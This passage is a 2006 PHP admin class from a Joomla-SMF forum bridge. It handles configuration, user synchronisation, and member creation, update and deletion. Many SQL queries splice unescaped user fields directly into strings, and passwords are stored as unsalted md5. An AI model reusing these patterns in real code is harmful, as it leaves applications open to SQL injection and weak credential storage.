<?php
/* tabstop=4 tabreplace=space */
/**
 * Joomla-SMF Forum
 *
 * This file is the functionality used in the Joomla backend
 *
 * LICENSE: This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
 *
 * @category    Component
 * @package     com_smf
 * @author      Cowboy <ross@joomlahacks.com>
 * @author      Wolverine <joshualross@gmail.com>
 * @copyright   (C) JoomlaHacks.com. All rights reserved.
 * @license     http://www.gnu.org/copyleft/gpl.html GNU/GPL
 * @version     $Id: admin.smf.class.php 306 2006-11-19 22:18:09Z joshualross $
 * @revision    $LastChangedRevision: 306 $
 * @date        $LastChangedDate: 2006-11-19 17:18:09 -0500 (Sun, 19 Nov 2006) $
 * @file        $HeadURL: http://scm.joomla.org/svn/repos/joomla-smf_2_0/admin.smf.class.php $
 * @link        http://www.JoomlaHacks.com
 * @link        http://www.joshualross.us
 * @since       File available since Release 2.0
 *
 * Visit JoomlaHacks.com for more Joomla Hacks!
 */

// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );
if (!defined('JSMFADMIN_BASE')) {
    /** #@+
     * Constants
     */
    /**
     * JSMFADMIN_BASE
     */
    define('JSMFADMIN_BASE', dirname(__FILE__));
    /** #@- */
}

/**
 * Joomla-SMF administration support
 * @package com_smf
 */
class jsmfAdmin {

    /**
     * Error message
     *
     * @var string $err
     */
    var $err = '';


    /**
     * Load the parameters
     *
     *
     * @access public
     * @param boolean $install Install process indicator, default to FALSE
     * @return mixed
     * @static boolean $is_loaded Cache object load indicator
     * @global object $database Joomla database
     * @global object $jsmfCache Joomla-SMF cache
     */
    function loadParams($install = FALSE)
    {
        global $database;
        global $jsmfCache;
        static $is_loaded;

        /**
         * Include the Cache Lite
         */
        if (!$install && empty($is_loaded)) {
            include_once JSMFADMIN_BASE . DIRECTORY_SEPARATOR . 'includes' . DIRECTORY_SEPARATOR . 'Lite.php';
            include_once JSMFADMIN_BASE . DIRECTORY_SEPARATOR . 'includes' . DIRECTORY_SEPARATOR . 'Function.php';
            $options = array(
                    'lifeTime' => 900,
                    'cacheDir' => JSMFADMIN_BASE . DIRECTORY_SEPARATOR .'cache' .DIRECTORY_SEPARATOR . 'db' . DIRECTORY_SEPARATOR,
                    'memoryCaching' => TRUE,
                    'automaticSerialization' => TRUE,
                    'automaticCleaningFactor' => 200, 
                    'hashedDirectoryLevel' => 1);
            $GLOBALS['jsmfCache'] = new JSMF_Cache_Lite_Function($options);
            $is_loaded = TRUE;
        }

        if (!$install && $jsmfConfig = $jsmfCache->get('jsmfConfig')) {
            return $jsmfConfig;
        } else {

            $query =
                "SELECT config " .
                "FROM #__jsmf_config";
            $database->setQuery( $query );
            unset($query);
            $result = $database->loadResult();

            $jsmfConfig = new stdClass();
            if (empty($result)) {
                $err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
                if (!$install) {
                    mosErrorAlert($err);
                }
                return FALSE;
            } else {
                $params = explode('|', $result);
                foreach($params as $param) {
                    list($key, $value) = explode('=', $param, 2);  //and the url's with option=com_smf??
                    $jsmfArray[$key] = $value;
                }
                $jsmfConfig = (object) $jsmfArray;
                unset($jsmfArray);
            }
            if (empty($jsmfConfig->url) && !$install) {
                if (!jsmfAdmin::getForumURL($jsmfConfig->url, $jsmfConfig->option)) {
                    mosErrorAlert($database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__);
                    return FALSE;
                }
            }

            if (!$install && $jsmfCache->save($jsmfConfig, 'jsmfConfig')) {
                //TODO cache save error
            }
        }
        return $jsmfConfig;
    }


    /**
     * Save the parameters
     *
     *
     * @access public
     * @param object $jsmfConfig_new Reference to the parameters object
     * @return boolean
     * @global object $database Joomla database object
     * @global object $jsmfCache Joomla-SMF cache
     */
    function saveParams(&$jsmfConfig_new)
    {
        global $database;
        global $jsmfCache;

        $jsmfConfig_cur = $this->loadParams();
        $jsmfConfig_new->last_modified = time();

        foreach ($jsmfConfig_new as $newkey => $newvalue) {
            if (empty($jsmfConfig_cur->$newkey) || $jsmfConfig_cur->$newkey != $newvalue) {
                $jsmfConfig_cur->$newkey = $newvalue;
            }
        }

        $params = array();
        foreach ($jsmfConfig_cur as $key => $value) {

            if (strcasecmp($key, 'task') != 0) {
               array_push($params, $key."=".$value);
            }
        }
        $params = implode('|', $params);
        if (!get_magic_quotes_gpc()) {
            $params = addslashes($params);
        }

        $query =
            "UPDATE #__jsmf_config " .
            "SET config = '$params' " .
            "WHERE id = 1";
        $database->setQuery($query);
        unset($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }
        if (!$jsmfCache->save($jsmfConfig_cur, 'jsmfConfig')) {
            //echo 'error saving';
        } else {
        	//echo 'cache save';
        }
        return true;

    }


    /**
     * This function takes an error as an argument and redirects the admin
     *
     * @access public
     * @param string $error
     * @return n/a
     */
    function returnError($error) {
        mosRedirect("index2.php?option=com_smf&amp;task=error", $error);
    }

    /**
     * Determines the patched status of $file
     *
     *
     * @access public
     * @param string $file Filename
     * @param string $search Patch text to search for
     * @return boolean
     */
    function isPatched($file, $search)
    {
        if (!file_exists($file)) {
            return false;
        }
        if (!$fd = fopen($file, "r")) {
            return false;
        }
        $contents = fread($fd, filesize($file));
        fclose($fd);
        if (strpos($contents, $search) !== false) {
            return true;
        }
        return false;
    }


    /**
     * Finds all users not in both tables and returns status if any are found
     *
     *
     * @access public
     * @return boolean
     * @global object $database Joomla database handle
     * @global object $jsmfConfig Joomla-SMF configurations
     */
    function isUserSync()
    {
        global $database;
        global $jsmfConfig;

        $query =
            "SELECT count(*)" .
            " FROM {$jsmfConfig->smf_prefix}members" .
            " LEFT JOIN #__users ON #__users.username={$jsmfConfig->smf_prefix}members.memberName" .
            " WHERE #__users.username IS NULL ";
        $database->setQuery($query);
        unset($query);
        if (intval($database->loadResult()) > 0) {
            return false;
        }
        if ($database->getErrorNum()) {
            $this->returnError(_JSMF_MSG_FAILED.":"._JSMF_MSG_SMF_JOOMLA_SYNC_CHECK_ERR.": db_error:".$database->getErrorMsg().mosGetParam($_SESSION, 'sync', '', _MOS_ALLOWHTML));
            return false;
        }

        $query =
            "SELECT count(*)" .
            " FROM #__users" .
            " LEFT JOIN {$jsmfConfig->smf_prefix}members ON {$jsmfConfig->smf_prefix}members.memberName = #__users.username" .
            " WHERE {$jsmfConfig->smf_prefix}members.memberName IS NULL";
        $database->setQuery($query);
        unset($query);
        if (intval($database->loadResult()) > 0) {
            return false;
        }

        if ($database->getErrorNum()) {
            $this->returnError(_JSMF_MSG_FAILED.":"._JSMF_MSG_SMF_JOOMLA_SYNC_CHECK_ERR.": db_error:".mosGetParam($_SESSION, 'sync_done', '', _MOS_ALLOWHTML));
            return false;
        }
        return true;
    }


    /**
     * Performs cached call to _isComInstalled
     *
     *
     * @access public
     * @param string $name Name of component
     * @return boolean
     * @global object $database Joomla database handle
     */
    function isComInstalled($name)
    {
        global $jsmfCache, $jsmfConfig;
        if ($jsmfConfig->use_function_cache) {
            return $jsmfCache->call('jsmfAdmin::_isComInstalled', $name);
        }
        return $this->_isComInstalled($name);
    }

    /**
     * Determines if given component is installed
     *
     *
     * @access public
     * @param string $name Name of component
     * @return boolean
     * @global object $database Joomla database handle
     */
    function _isComInstalled($name)
    {
        global $database;
        $query =
            "SELECT name " .
            "FROM #__components " .
            "WHERE name LIKE '$name' ";
        $database->setQuery($query);
        unset($query);
        if (!$database->loadResult()) {
            return false;
        }
        return true;
    }

    /**
     * Makes a cached call to isModuleInstalled
     *
     *
     * @access public
     * @param string $name module name
     * @return boolean
     * @global object $jsmfCache Joomla-SMF Cache
     */
    function isModuleInstalled($name)
    {
        global $jsmfCache, $jsmfConfig;
        if ($jsmfConfig->use_function_cache) {
            return $jsmfCache->call('jsmfAdmin::_isModuleInstalled', $name);
        }
        return $this->_isModuleInstalled($name);
    }

    /**
     * Determines if a given module is installed
     *
     *
     * @access public
     * @param string $name module name
     * @return boolean
     * @global object $database Joomla database handle
     */
    function _isModuleInstalled($name)
    {
    	global $database;

        $query =
            "SELECT module " .
            "FROM #__modules " .
            "WHERE module='$name' " .
            "LIMIT 1";
        $database->setQuery($query);
        unset($query);
        if (!$database->query()) {
        	return false;
        }
        return true;
    }

    /**
     * Makes a cached call to _isMambotInstalled()
     *
     *
     * @access public
     * @param string $name mambot name
     * @return boolean
     * @global object $jsmfCache Joomla-SMF cache
     */
    function isMambotInstalled($name)
    {
        global $jsmfCache, $jsmfConfig;
        if ($jsmfConfig->use_function_cache) {
            return $jsmfCache->call('jsmfAdmin::_isMambotInstalled', $name);
        }
        return $this->_isMambotInstalled($name);
    }
    
    /**
     * determines if a given mambot is installed
     *
     *
     * @access public
     * @param string $name mambot name
     * @return boolean
     * @global object $database Joomla database handle
     */
    function _isMambotInstalled($name)
    {
        global $database;

        $query =
            "SELECT name " .
            "FROM #__mambots " .
            "WHERE element='$name' " .
            "LIMIT 1";
        $database->setQuery($query);
        unset($query);
        if (!$database->query()) {
            return false;
        }
        return true;
    }

    /**
     * Cache call _getComponentId
     * 
     * @param string $name Name of the component
     * @return mixed
     * @access public
     */
    function getComponentId($name) 
    {
        global $jsmfCache, $jsmfConfig;
        if ($jsmfConfig->use_function_cache) {
            return $jsmfCache->call('jsmfAdmin::_getComponentId', $name);
        }
        return $this->_getComponentId($name);
    }

    /**
     * Queries database for itemid associated with the component name, returns
     * false if not found
     * 
     * @param string $name Name of the component
     * @return mixed
     * @access private
     */
    function _getComponentId($name)
    {
        global $database;
        $query =
            "SELECT link " .
            "FROM #__components " .
            "WHERE name LIKE '$name' ";
        $database->setQuery($query);
        if (!($link = $database->loadResult())) {
            return false;
        }
        $query =
            "SELECT id " .
            "FROM #__menu " .
            "WHERE link='index.php?{$link}' " .
            "LIMIT 1";
        $database->setQuery($query);
        if (!($itemid = $database->loadResult())) {
        	return false;
        }
        return $itemid;
    }

    /**
     * Performs user synchronization
     *
     *
     * @access public
     * @param int reference $joomla Joomla user sync count
     * @param int reference $smf SMF user sync count
     * @return boolean
     * @global object $database Joomla database handle
     * @global object $jsmfConfig Joomla-SMF configurations
     */
    function syncUsers(&$joomla, &$smf)
    {
        global $database;
        global $jsmfConfig;
        $this->err = '';
        $err_msg  = '';

        $query =
            "SELECT name, username, password, email, registerDate, block, activation " .
            "FROM #__users " .
            "LEFT JOIN {$jsmfConfig->smf_prefix}members ON {$jsmfConfig->smf_prefix}members.memberName = #__users.username " .
            "WHERE {$jsmfConfig->smf_prefix}members.memberName IS NULL";
        $database->setQuery($query);
        unset($query);
        $rows = $database->loadObjectList();
        if ($database->getErrorNum()) {
            $this->err .= $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        foreach ($rows as $row) {
            if(!$this->createSMFUser($row)) {
                $err_msg .= "<br />$row->memberName : "._JSMF_MSG_FAILED." : $this->err";
                continue;
            }
            $smf++;
        }
        unset($rows);
        $query =
            "SELECT memberName, realName, passwd, emailAddress, dateRegistered, is_activated, validation_code " .
            "FROM {$jsmfConfig->smf_prefix}members " .
            "LEFT JOIN #__users ON #__users.username={$jsmfConfig->smf_prefix}members.memberName " .
            "WHERE #__users.username IS NULL";
        $database->setQuery($query);
        unset($query);
        $rows = $database->loadObjectList();
        if ($database->getErrorNum()) {
            $this->err .= $err_msg . $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        foreach ($rows as $row) {
            if (!$this->createJoomlaUser($row)) {
                $err_msg .= "<br />$row->memberName : " ._JSMF_MSG_FAILED." : $this->err";
                continue;
            }
            $joomla++;
        }
        unset($rows);
        if (!empty($err_msg)) {
            $this->err = $err_msg;
            return false;
        }
        return true;
    }

    /**
     * This function creates a new user in Joomla using mosUser and optionally adds
     * them to CB if installed. The data expected should be an object with the
     * following memebers:
     *  realName - optional, memberName, emailAddress, passwd, validation_code, is_activated
     * Errors are set to jsmfAdmin->err on failure
     *
     * @access public
     * @param object $data User information
     * @return boolean
     * @global object $database Joomla database handle
     * @global object $my
     * @global object $acl
     */
    function createJoomlaUser($data)
    {
        global $database, $my, $acl;
        global $jsmfConfig;

        $row = new mosUser($database);

        if ($jsmfConfig->sync_uname) {
        	$user['name']   = $data->memberName;
        } else {
    	   $user['name']    = $data->realName;
        }
        $user['username']   = $data->memberName;
        $user['email']      = $data->emailAddress;
        $user['password']   = $data->passwd;

        if (!$row->bind($user)) {
            unset($user);
            $this->err = $row->getError()."\n".__FILE__."\n".__FUNCTION__."\n".__LINE__;
            return false;
        }
        unset($user);
        mosMakeHtmlSafe($row);
        $row->id            = 0;
        $row->usertype      = 'Registered';
        $row->gid           = $acl->get_group_id('Registered','ARO');
        $row->activation    = $data->validation_code;
        if ($data->is_activated) {
        	$row->block     = 0;
        } else {
            $row->block     = 1;
        }

        if (!$row->check()) {
            $this->err = $row->getError()."\n".__FILE__."\n".__FUNCTION__."\n".__LINE__;
            return false;
        }

        $row->password = md5($row->password);
        $row->registerDate = date("Y-m-d H:i:s",$data->dateRegistered);

        if (!$row->store()) {
            $this->err = $row->getError()."\n".__FILE__."\n".__FUNCTION__."\n".__LINE__;
            return false;
        }

        $row->checkin();

        //is CB installed, if so add this user to the comprofiler table
        if ($this->isComInstalled('Community Builder%')) {
            $query =
                "INSERT into #__comprofiler " .
                "( id, user_id, firstname, lastupdatedate) " .
                "VALUES " .
                "( '$row->id', '$row->id', '$row->name', '".date('Y-m-d\TH:i:s')."')";
            $database->setQuery($query);
            unset($query);
            if (!$database->query()) {
                $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
                return false;
            }
        }
        unset($row, $query);
        return true;
    }

    /**
     * Creates a user in SMF
     * The data expected should be an object with the following members:
     * name - optional, username, email, password, registerDate, block, activation
     *
     *
     * @access public
     * @param object $data User information
     * @return boolean
     * @global object $database Joomla database handle
     * @global object $jsmfConfig Joomla-SMF Cofnigurations
     */
    function createSMFUser($data)
    {
        global $database;
    	global $jsmfConfig;


        $query =
            "INSERT INTO {$jsmfConfig->smf_prefix}members " .
            "(realName, memberName, emailAddress, passwd, dateRegistered, hideEmail, is_activated, validation_code) " .
            "VALUES ";
        if ($jsmfConfig->sync_uname) {
            $query .= "('$data->username',";
        } else {
            $query .= "('$data->name',";
        }
        $query .=
            "'$data->username' ,'$data->email' ,'$data->password', UNIX_TIMESTAMP('".$data->registerDate."'), '$jsmfConfig->hide_email', ".($data->block ? 0 : 1).", '$data->activation')";

        $database->setQuery($query);
        unset($query);
        if (!$database->query()) {
        	$this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        if (!$this->updateUserCount()) {
        	return false;
        }
        return true;
    }

    /**
     * Updates the SMF user count
     *
     *
     * @access public
     * @return boolean
     * @global object $database Joomla database handle
     * @global object $jsmfCofnig Joomla-SMF configurations
     */
    function updateUserCount()
    {
        global $database;
        global $jsmfConfig;

        $query =
            "SELECT COUNT(ID_MEMBER) " .
            "FROM {$jsmfConfig->smf_prefix}members";
        $database->setQuery($query);
        $total = $database->loadResult();
        if ($database->getErrorNum()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }
        $query =
            "UPDATE {$jsmfConfig->smf_prefix}settings " .
            "SET value='$total' " .
            "WHERE variable='memberCount'";
        $database->setQuery($query);
        unset($total, $query);
        if(!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }
        //update statistics as well
        require_once($jsmfConfig->smf_path . '/SSI.php');
        /**
         * Require SMF source file Subs.php for stat tracking
         */
        require_once($jsmfConfig->smf_path . '/Sources/Subs.php');
        updateStats('member');
        trackStats(array('registers' => '+'));
        trackStats();
        return true;
    }


    /**
     * Used to delete a single SMF member
     *
     *
     * @access public
     * @param object $data User information
     * @return boolean
     * @global object $database Joomla database handle
     * @global object $my
     * @global array $modSettings SMF settings array
     * @global object $jsmfConfig Joomla-SMF configurations
     */
    function deleteMember($data)
    {
        global $database, $my;
        global $modSettings;
        global $jsmfConfig;


        $uid = $this->getSMFid($data->id, $data->username);
        if (empty($uid)) {
            //this user does not exist in SMF
            //$this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return true;
        }
        $users = array($uid);

        require_once($jsmfConfig->smf_path . '/SSI.php');

        //This is used in SMF because multiple users can be deleted at once,
        //and the condition is different when many users
        $condition = '= ' . $uid;

        // Make these peoples' posts guest posts.
        $query =
            "UPDATE {$jsmfConfig->smf_prefix}messages " .
            "SET ID_MEMBER = 0" . (!empty($modSettings['allow_hideEmail']) ? ", posterEmail = ''" : '') .
            "WHERE ID_MEMBER $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        $query =
            "UPDATE {$jsmfConfig->smf_prefix}polls  " .
            "SET ID_MEMBER = 0  " .
            "WHERE ID_MEMBER $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        // Make these peoples' posts guest first posts and last posts.
        $query =
            "UPDATE {$jsmfConfig->smf_prefix}topics " .
            "SET ID_MEMBER_STARTED = 0 " .
            "WHERE ID_MEMBER_STARTED $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        $query =
            "UPDATE {$jsmfConfig->smf_prefix}topics " .
            "SET ID_MEMBER_UPDATED = 0 " .
            "WHERE ID_MEMBER_UPDATED $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        $query =
            "UPDATE {$jsmfConfig->smf_prefix}log_actions " .
            "SET ID_MEMBER = 0 " .
            "WHERE ID_MEMBER $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        $query =
            "UPDATE {$jsmfConfig->smf_prefix}log_banned " .
            "SET ID_MEMBER = 0 " .
            "WHERE ID_MEMBER $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        $query =
            "UPDATE {$jsmfConfig->smf_prefix}log_errors " .
            "SET ID_MEMBER = 0 " .
            "WHERE ID_MEMBER $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        // Delete the member.
        $query =
            "DELETE FROM {$jsmfConfig->smf_prefix}members " .
            "WHERE ID_MEMBER $condition " .
            "LIMIT 1";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        // Delete the logs...
        $query =
            "DELETE FROM {$jsmfConfig->smf_prefix}log_boards " .
            "WHERE ID_MEMBER $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        $query =
            "DELETE FROM {$jsmfConfig->smf_prefix}log_karma " .
            "WHERE ID_TARGET $condition " .
            "OR ID_EXECUTOR $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        $query =
            "DELETE FROM {$jsmfConfig->smf_prefix}log_mark_read " .
            "WHERE ID_MEMBER $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        $query =
            "DELETE FROM {$jsmfConfig->smf_prefix}log_notify " .
            "WHERE ID_MEMBER $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        $query =
            "DELETE FROM {$jsmfConfig->smf_prefix}log_online " .
            "WHERE ID_MEMBER $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        $query =
            "DELETE FROM {$jsmfConfig->smf_prefix}log_polls " .
            "WHERE ID_MEMBER $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        $query =
            "DELETE FROM {$jsmfConfig->smf_prefix}log_topics " .
            "WHERE ID_MEMBER $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        $query =
            "DELETE FROM {$jsmfConfig->smf_prefix}collapsed_categories " .
            "WHERE ID_MEMBER $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }


        //The whole idea in SMF is that a personal message is reference by both
        // the sender and the recipient.  So first we set all the pm's of this
        // user as deleted by sender or recip then we go through and find
        // all messages that are deleted by both.
        // Delete personal messages.
        require_once($jsmfConfig->smf_path . '/Sources/PersonalMessage.php');
        deleteMessages(null, null, $users);

        $query =
            "UPDATE {$jsmfConfig->smf_prefix}personal_messages " .
            "SET ID_MEMBER_FROM = 0 " .
            "WHERE ID_MEMBER_FROM $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        // Delete avatar.
        require_once($jsmfConfig->smf_path . '/Sources/ManageAttachments.php');
        removeAttachments('a.ID_MEMBER ' . $condition);

        // It's over, no more moderation for you.
        $query =
            "DELETE FROM {$jsmfConfig->smf_prefix}moderators " .
            "WHERE ID_MEMBER $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        // If you don't exist we can't ban you.
        $query =
            "DELETE FROM {$jsmfConfig->smf_prefix}ban_items " .
            "WHERE ID_MEMBER $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        // Remove individual theme settings.
        $query =
            "DELETE FROM {$jsmfConfig->smf_prefix}themes " .
            "WHERE ID_MEMBER $condition";
        $database->setQuery($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }

        // These users are nobody's buddy nomore.
        $query =
            "SELECT ID_MEMBER, pm_ignore_list, buddy_list " .
            "FROM {$jsmfConfig->smf_prefix}members " .
            "WHERE FIND_IN_SET(" . implode(', pm_ignore_list) OR FIND_IN_SET(', $users) . ', pm_ignore_list) OR FIND_IN_SET(' . implode(', buddy_list) OR FIND_IN_SET(', $users) . ', buddy_list)';
        $database->setQuery($query);
        $result = $database->loadAssocList();
        foreach ($result as $row) {
            $query =
                "UPDATE {$jsmfConfig->smf_prefix}members " .
                "SET " .
                    "pm_ignore_list = '" . implode(',', array_diff(explode(',', $row['pm_ignore_list']), $users)) . "', " .
                    "buddy_list = '" . implode(',', array_diff(explode(',', $row['buddy_list']), $users)) . "' " .
                "WHERE ID_MEMBER = $row[ID_MEMBER] " .
                "LIMIT 1";
                $database->setQuery($query);
                unset($query);
                if (!$database->query()) {
    	            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
                    return false;
                }
        }
        unset($query);
        updateStats('calendar');
        updateStats('member');
        return true;
    }

    /**
     * Update member data in SMF
     *
     *
     * @access public
     * @param object $data User information
     * @param object $extras User information extras, default null
     * @return boolean
     * @global object $database Joomla database handle
     * @global object $jsmfConfig Joomla-SMF configurations
     */
    function updateMember($data, $extras=null)
    {
        global $database;
        global $jsmfConfig, $jsmfCache;
        $uid = $this->getSMFid($data->id, $data->username);
        if (!$uid) {
            //might be updating their username
            if ($jsmfConfig->cache_user_array) {
                $user_array = $jsmfCache->get('user_array');
                if (empty($user_array)) {
                	jsmfFrontend::_buildUserArray();
                    $user_array = $jsmfCache->get('user_array');
                }
                $uid = array_search($data->id, $user_array);
            }
            if (empty($uid)) {
                //user doesn't exist, no good
                $this->err = 'Username ('.$data->username.') does not exist in SMF or not able to retrieve userid ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
                return false;
            }
        }

        $smf_cols = array(
            'id'            => '',
            'name'          => 'realName',
            'username'      => 'memberName',
            'email'         => 'emailAddress',
            'password'      => '',
            'usertype'      => '',
            'block'         => '', //not is_activated
            'sendEmail'     => '',
            'gid'           => '', //ID_GROUP
            'registerDate'  => '',
            'lastvisitDate' => '',
            'activation'    => '',
            'params'        => '',
            '_tbl'          => '',
            '_tbl_key'      => '',
            '_error'        => '',
            '_db'           => '');

        $set_string = '';
        foreach ($data as $key => $val) {
        	$field = $smf_cols[$key];
        	if (!empty($field)) {
	        	if ($jsmfConfig->sync_uname && strcasecmp($field, 'realName') == 0) {
	        		$set_string .= "$field = '".$data->username."', ";
	        	} else {
                	$set_string .= "$field = '$val', ";
	        	}
            }

        }

        if (!empty($set_string)) {
            $query =
                "UPDATE {$jsmfConfig->smf_prefix}members " .
                "SET " . substr($set_string, 0, -2) . " " .
                "WHERE ID_MEMBER = '$uid'";
            $database->setQuery($query);
            unset($smf_cols, $uid, $set_string, $query);
            if (!$database->query()) {
                $jsmf->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
                return false;
            }
        }
        return true;

        /*
        Row::id => 76
        Row::name => test
        Row::username => test
        Row::email => test@test.com
        Row::password =>
        Row::usertype => Registered
        Row::block => 0
        Row::sendEmail => 0
        Row::gid => 18
        Row::registerDate =>
        Row::lastvisitDate =>
        Row::activation =>
        Row::params =>
        Row::_tbl => #__users
        Row::_tbl_key => id
        Row::_error =>
        Row::_db => Object id #2
        Extras::id => 76
        Extras::user_id => 76
        Extras::avatar =>
        Extras::avatarapproved =>
        Extras::approved => 1
        Extras::confirmed => 1
        Extras::hits =>
        Extras::_tbl => #__comprofiler
        Extras::_tbl_key => id
        Extras::_error =>
        Extras::_db => Object id #2
        Extras::firstname =>
        Extras::middlename =>
        Extras::lastname =>
         */

    }

    /**
     * This function accepts user information and validates that a user with
     * this information is not already registered
     *
     *
     * @access public
     * @param object $data User information
     * @return boolean
     * @global object $database Joomla database handle
     * @global object $jsmfConfig Joomla-SMF configurations
     */
    function validateMember($data)
    {
    	global $database;
        global $jsmfConfig;

        $query =
            "SELECT memberName " .
            "FROM {$jsmfConfig->smf_prefix}members " .
            "WHERE memberName = '$data->username' " .
            "OR emailAddress = '$data->email'";
        $database->setQuery($query);
        unset($query);
        $result = $database->loadResult();
        if (empty($result)) {
            return TRUE;
        }
        unset($result);
        return FALSE;
    }


    /**
     * Synchronize avatars on update
     *
     *
     * @access public
     * @param object $data User information
     * @param object $extras User information extras
     * @param string $filename File name
     * @return boolean
     * @global object $database Joomla database handle
     * @global string $mosConfig_live_site
     * @global $jsmfConfig Joomla-SMF configurations
     */
    function updateAvatar($data, $extras, $filename)
    {
        global $database, $mosConfig_live_site;
        global $jsmfConfig;

        $uid = $this->getSMFid($data->id, $data->username);
        if (empty($uid)) {
        	//no smf user
            return true; 
            //TODO updateAvatar if smf uid is empty?
        }
        $av_url = $mosConfig_live_site . '/images/comprofiler/tn' . $filename;

        $query =
            "UPDATE {$jsmfConfig->smf_prefix}members " .
            "SET avatar = '$av_url' " .
            "WHERE ID_MEMBER = '$uid' " .
            "LIMIT 1";
        $database->setQuery($query);
        unset($uid, $av_url, $query);
        if (!$database->query()) {
        	$this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }
        return true;

    }
    
    function deleteAvatar()
    {
    	
        
    }

    /**
     * Updates a user's password in SMF
     *
     *
     * @access public
     * @param int $id Joomla/CB user id
     * @param string $pass New user password
     * @return boolean
